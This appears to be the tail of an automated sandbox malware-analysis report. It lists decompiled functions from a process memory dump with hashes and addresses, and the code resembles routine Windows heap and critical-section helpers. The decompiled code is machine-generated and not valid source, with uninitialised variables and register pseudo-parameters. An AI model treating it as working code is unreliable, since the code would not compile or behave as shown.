                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a619b0622c201325bacc664ed320b4754d4bb2e8b963c8599670737baa712f3
                                                    • Instruction ID: d8d45cb34c6d9c064f9f6c3e9b7b906fad064e719e9d2b0d81c56fbd628786b0
                                                    • Opcode Fuzzy Hash: 5a619b0622c201325bacc664ed320b4754d4bb2e8b963c8599670737baa712f3
                                                    • Instruction Fuzzy Hash: 0FE0DFB120B3049FE735EB66D360F35F79ADF42729F1980DDE8084B921C621F880DA16
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BD41E8, Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E04BD41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x4c208f0);
				_t5 = E04B9D08C(__ebx, __edi, __esi);
				if( *0x4c387ec == 0) {
					E04B5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x4c387ec == 0) {
						 *0x4c387f0 = 0x4c387ec;
						 *0x4c387ec = 0x4c387ec;
						 *0x4c387e8 = 0x4c387e4;
						 *0x4c387e4 = 0x4c387e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04BD4248();
				}
				return E04B9D0D1(_t5);
			}





                                                    0x04bd41e8
                                                    0x04bd41ea
                                                    0x04bd41ef
                                                    0x04bd41fb
                                                    0x04bd4206
                                                    0x04bd420b
                                                    0x04bd4216
                                                    0x04bd421d
                                                    0x04bd4222
                                                    0x04bd422c
                                                    0x04bd4231
                                                    0x04bd4231
                                                    0x04bd4236
                                                    0x04bd423d
                                                    0x04bd423d
                                                    0x04bd4247

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 20a6cedb2c4656118900ec483452972be7453490bcd02cd1c45190bba196ce03
                                                    • Instruction ID: de089a0c32ae6e244e09ac9edd5ee5b98fb2f3bf17c3cbe7a71a69bae01523a5
                                                    • Opcode Fuzzy Hash: 20a6cedb2c4656118900ec483452972be7453490bcd02cd1c45190bba196ce03
                                                    • Instruction Fuzzy Hash: C1F0F2789207009FEBA0FFAAA50470436E6E74621AF0045AAB10486284D778B980CF31
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BFD380, Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04BFD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L04B4E8B0(__ecx, _a4, 0xfff);
					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                    0x04bfd38a
                                                    0x04bfd39b
                                                    0x04bfd3b1
                                                    0x00000000
                                                    0x04bfd3b6
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                    • Instruction ID: 950b754e321f3d8d87c55dc78759f5dd5fa9cdc260ef9581b7b8f403526fae9e
                                                    • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                    • Instruction Fuzzy Hash: A8E0C231280204BBEB226E44CC00F797B1AEB407A4F104071FF0D5A690CA79FC91E6C4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7A185, Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B7A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4c367e4 >= 0xa) {
					if(_t5 < 0x4c36800 || _t5 >= 0x4c36900) {
						return L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04B60010(0x4c367e0, _t5);
				}
			}





                                                    0x04b7a190
                                                    0x04b7a1a6
                                                    0x04b7a1c2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7a192
                                                    0x04b7a192
                                                    0x04b7a19f
                                                    0x04b7a19f

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 286e4819422e55a4312e712f70c5b900a31e24984d9049fb50b961abe3c78392
                                                    • Instruction ID: 27b352b43e63c6b03725be1a9c5d3e3537a963fc67d0272e670381777669b8ef
                                                    • Opcode Fuzzy Hash: 286e4819422e55a4312e712f70c5b900a31e24984d9049fb50b961abe3c78392
                                                    • Instruction Fuzzy Hash: C7D0C7A12200003AF63C6720A854B292223EBCAB4EF2008CCE1070A9A0DA68F8E08208
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B716E0, Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B716E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04B71710(0x4c367e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04B64620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                    0x04b716e8
                                                    0x04b716ef
                                                    0x04b716f3
                                                    0x04b716fe
                                                    0x00000000
                                                    0x04b71700
                                                    0x04b7170d
                                                    0x04b7170d
                                                    0x04b716f2
                                                    0x04b716f2
                                                    0x04b716f2
                                                    0x04b716f2

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 04990dd43bcab6bf4ff2f57ebd556630c5aa4f7a7e4024764c6eded16626eb01
                                                    • Instruction ID: b8a76ec50acb8848f33016a7b8589cdb3ac54b2691998d84df98f0d15adbacfb
                                                    • Opcode Fuzzy Hash: 04990dd43bcab6bf4ff2f57ebd556630c5aa4f7a7e4024764c6eded16626eb01
                                                    • Instruction Fuzzy Hash: 5CD0A7B120010062FA2D5B189854B152256EBC078AF3800DCF117595C0CFB4FC92E46C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BC53CA, Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04BC53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E04B5EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                    0x04bc53ca
                                                    0x04bc53ce
                                                    0x04bc53d9
                                                    0x04bc53de
                                                    0x04bc53e1
                                                    0x04bc53e1
                                                    0x04bc53e6
                                                    0x04bc53f3
                                                    0x00000000
                                                    0x04bc53f8
                                                    0x04bc53fb

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                    • Instruction ID: 854aa97b35f5d06570bb20e5dc45c0e0dc9542b3daf2e3f3139f22ce926eab64
                                                    • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                    • Instruction Fuzzy Hash: 52E0EC71954684ABDF22DF59CA90F5EB7F5FB84B44F150498A4096B661C668FD00CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B735A1, Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B735A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E04B5EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                    0x04b735a1
                                                    0x04b735a1
                                                    0x04b735a5
                                                    0x04b735ab
                                                    0x04b735ab
                                                    0x04b735b5
                                                    0x00000000
                                                    0x04b735c1
                                                    0x04b735b7

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction ID: e19e1aca16204b17fb6e2a88fe002a9ff182799e35661a337fb71166f5182704
                                                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction Fuzzy Hash: C4D0A9315011809AEB01AF10C21876C73F2FB00308F5830E98C1206862C33EAA0AF600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B5AAB0, Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B5AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                    0x04b5aab6
                                                    0x04b5aabb
                                                    0x04baa442
                                                    0x00000000
                                                    0x04baa448
                                                    0x04baa454
                                                    0x04baa454
                                                    0x04b5aac1
                                                    0x04b5aac1
                                                    0x04b5aac6
                                                    0x04b5aac6

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction ID: 771f9dfa271a89d5cd4e7d23945dc38430e177ff8d69e0fbaa612dde99addf23
                                                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction Fuzzy Hash: 1ED0C235252A80CFD6169B1DC564B1573A4FB48B44FC505D0E901CBA61E628E955CA10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BCA537, Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04BCA537(intOrPtr _a4, intOrPtr _a8) {

				return L04B68E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                    0x04bca553

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction ID: 1cda7b584e82083db91f192f55c33c4c64066a4007423fcbaba4158f5a0d196a
                                                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction Fuzzy Hash: 5CC01232080248BBCB126E81CC00F067B2AEB94B60F008410BA480A5608636E970EA84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B4DB40, Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B4DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04B64620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                    0x04b4db4d
                                                    0x04b4db54
                                                    0x04b4db5f
                                                    0x04b4db56
                                                    0x04b4db56
                                                    0x04b4db5c
                                                    0x04b4db5c

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction ID: 0f572d00ac53375df201efc0c9b1e5273a4858c784e1d843968e0b5f1e729dd0
                                                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction Fuzzy Hash: 84C08C30280A00AAEB221F20CD11B0136A4FB41B09F4400E0A301DA0F0DB7CE801EA00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B4AD30, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B4AD30(intOrPtr _a4) {

				return L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                    0x04b4ad49

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction ID: d10b77ce1cf150511aaed83374c6f71821479dd8f6babbd43e036c6cf6cc8d1b
                                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction Fuzzy Hash: 31C08C32080248BBC7126A45CD00F117B29E790B60F000020B6080A661893AE860D588
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B576E2, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B576E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                    0x04b576e4
                                                    0x00000000
                                                    0x04b576f8
                                                    0x04b576fd

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction ID: 16646d07f500903a5f57a0b52fa4d065f8858f82896b2ec16e79428111515454
                                                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction Fuzzy Hash: 62C08C702511C05AEB2A6B08CE20B307650EB0870CF4801DCAE06094B1CB6CB802C288
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B736CC, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B736CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                    0x04b736d2
                                                    0x04b736e8
                                                    0x04b736d4
                                                    0x04b736e5
                                                    0x04b736e5

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction ID: 59b9c0b75956594f4c2348d6bf0dffd7061e6431a64ee18503fbcdc33889634d
                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction Fuzzy Hash: 81C04C75195840AAE6155B208D51B157294F741A65F6406D47221495E0D569AC00E504
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B63A1C, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B63A1C(intOrPtr _a4) {
				void* _t5;

				return L04B64620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                    0x04b63a35

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction ID: 9b309939e33f3cd851c61882f62dd19c9d509ad985ad3455e8464d371686fa31
                                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction Fuzzy Hash: 7EC08C32080648BBC7126E41DC00F027B29E790B60F000060B6040A5608536EC60D98C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B67D50, Relevance: .0, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B67D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                    0x04b67d56
                                                    0x04b67d5b
                                                    0x04b67d60
                                                    0x04b67d5d
                                                    0x04b67d5d
                                                    0x04b67d5d

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction ID: ea66f222cdf0664df8c54bc1a391fc4e215ccb4436e1b970e5201883f6ef18a7
                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction Fuzzy Hash: 0DB092343019408FDF16DF18C080B1533E4FB44A44B8404D0E401CBA20D629E8009900
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B72ACB, Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E04B72ACB() {
				void* _t5;

				return E04B5EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                    0x04b72adc

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction ID: 84ec2fee824c2b5710615c68f74594a85f49c27fa60118d92b250daa64efbfb0
                                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction Fuzzy Hash: 94B092328104408BCF02AF40C650B19B331AB00650F0544909401279308228AD01CA40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BDFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E04BDFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04B8CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04BD5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04BD5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                    0x04bdfdda
                                                    0x04bdfde2
                                                    0x04bdfde5
                                                    0x04bdfdec
                                                    0x04bdfdfa
                                                    0x04bdfdff
                                                    0x04bdfe0a
                                                    0x04bdfe0f
                                                    0x04bdfe17
                                                    0x04bdfe1e
                                                    0x04bdfe19
                                                    0x04bdfe19
                                                    0x04bdfe19
                                                    0x04bdfe20
                                                    0x04bdfe21
                                                    0x04bdfe22
                                                    0x04bdfe25
                                                    0x04bdfe40

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BDFDFA
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04BDFE2B
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04BDFE01
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    • Opcode ID: c88ab69d46eabd568ee91bd2acea43b7b123d3bc66b8a3c7f0180864c90746c7
                                                    • Instruction ID: 025c21164d4e7237615bed85883c0044e411a8d89b04ebcfbfedece973536ad5
                                                    • Opcode Fuzzy Hash: c88ab69d46eabd568ee91bd2acea43b7b123d3bc66b8a3c7f0180864c90746c7
                                                    • Instruction Fuzzy Hash: 8FF0CD72204201BBEA241A46DC02F23BB6AEB44B31F2442D4F628561E1EA62F82096B4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%